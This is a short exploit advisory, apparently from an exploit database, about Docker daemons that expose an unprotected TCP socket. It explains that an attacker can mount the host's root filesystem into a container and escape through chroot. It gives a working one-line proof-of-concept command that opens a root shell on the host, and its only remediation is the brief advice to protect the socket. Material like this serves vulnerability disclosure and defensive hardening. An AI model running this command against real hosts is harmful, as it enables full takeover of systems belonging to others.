Docker Daemon Exploit, Unprotected TCP Socket

# Exploit Title: Docker Daemon - Unprotected TCP Socket
# Date: 20-07-2017
# Exploit Author: Martin Pizala
# Vendor Homepage:
# Software Link:
# Version: Since 0.4.7 (2013-06-28) (feature: mount host directories)
# Tested on: Docker CE 17.06.0-ce and Docker Engine 1.13.1
1. Description

Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container and use chroot to escape the container-jail.

2. Proof of Concept

docker -H tcp://<ip>:<port> run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh

3. Solution:

Protect the tcp socket

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